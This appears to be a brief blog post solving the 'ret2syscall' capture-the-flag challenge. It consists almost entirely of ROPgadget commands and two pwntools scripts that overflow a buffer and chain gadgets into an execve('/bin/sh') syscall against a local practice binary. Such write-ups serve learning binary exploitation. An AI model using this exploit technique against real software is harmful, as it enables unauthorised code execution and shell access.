pwn-ret2syscall






ROPgadget --binary ret2syscall |grep "pop" |grep "eax" |grep "ret"
ROPgadget --binary ret2syscall --only "pop|eax|ret"

from pwn import *
r = process("./ret2syscall")
offset = 112
eax=0x080bb196
edcbx=0x0806eb90
sh=0x080be408
int0x80=0x08049421
payload = b'a'*(offset)+p32(eax)+p32(0xb)+p32(edcbx)+p32(0)+p32(0)+p32(sh)+p32(int0x80)
r.sendline(payload)
r.interactive()


from pwn import *
r = process("./ret2syscall")
offset = 112
eax=0x080bb196
ebx=0x080481c9
ecbx=0x0806eb91
edx=0x0806eb6a
edcbx=0x0806eb90
sh=0x080be408
int0x80=0x08049421
payload = b'a'*(offset)+p32(eax)+p32(0xb)+p32(ecbx)+p32(0)+p32(sh)+p32(edx)+p32(0)+p32(int0x80)
r.sendline(payload)
r.interactive()

posted @ 2025-04-23 22:32  lethe311  阅读(5)  评论(0)    收藏  举报